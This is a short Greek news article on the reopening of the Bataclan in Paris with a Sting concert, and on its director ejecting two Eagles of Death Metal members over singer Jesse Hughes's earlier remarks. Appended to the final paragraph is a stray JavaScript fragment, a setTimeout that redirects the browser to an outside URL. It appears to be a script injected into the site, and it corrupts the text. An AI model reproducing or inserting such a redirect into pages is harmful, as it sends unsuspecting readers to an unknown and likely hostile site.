«Πόρτα» έφαγαν στο Bataclan δύο μέλη των Eagles of Death Metal

0
14

 

Έναν χρόνο μετά από την τρομοκρατική επίθεση στο Παρίσι που στοίχισε τη ζωή σε 89 άτομα χθες πραγματοποιήθηκε ιστορικής σημασίας συναυλία στο παρισινό θέατρο Bataclan.

Μετά από 12 μήνες σιωπής, ο συναυλιακός χώρος άνοιξε ξανά το βράδυ του Σαββάτου με μια συναισθηματικά φορτισμένη συναυλία του Βρετανού τραγουδιστή Sting.

Όπως ήταν αναμενόμενο, αρκετοί κάτοικοι της πόλης έσπευσαν να αποτίσουν φόρο τιμής στα θύματα της επίθεσης, αποθέτοντας λουλούδια κοντά στο σημείο όπου είχαν σκοτωθεί τόσοι άνθρωποι.

Παρά την επιτυχία και την συμβολική αξία της χθεσινής συναυλίας δεν έλειψαν και τα απρόοπτα. Όπως μεταδίδουν τα διεθνή μέσα, δύο μέλη του συγκροτήματος Eagles of Death Metal, του συγκροτήματος που έπαιζε στο Bataclan τη μοιραία βραδιά της επίθεσης, «έφαγαν πόρτα» όταν προσπάθησαν να μπουν στον χώρο για να παρακολουθήσουν τη συναυλία.

Σύμφωνα με το Γαλλικό Πρακτορείο, επρόκειτο για τον τραγουδιστή Τζέσι Χιους και ένα άλλο μέλος της μπάντας, που εκδιώχθηκαν κακήν κακώς από τον χώρο από τον διευθυντή του Bataclan, Ζυλ Φρουτός.

«Ήρθαν και τους πέταξα έξω. Υπάρχουν πράγματα που δεν συγχωρούνται», είπε ο Φρουτός στο Γαλλικό Πρακτορείο, αναφερόμενος προφανώς στις αμφιλεγόμενες δηλώσεις του μετά την τραγωδία, οι οποίες είχαν προκαλέσει έντονες επικρίσεις.
Yπενθυμίζεται ότι ο τραγουδιστής των Eagles of Death Metal είχε προκαλέσει την οργή μεγάλης μερίδας των κατοίκων του Παρισιού, υποστηρίζοντας ότι μετά την επίθεση είδε «μουσουλμάνους να πανηγυρίζουν» στο κέντρο της πόλης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here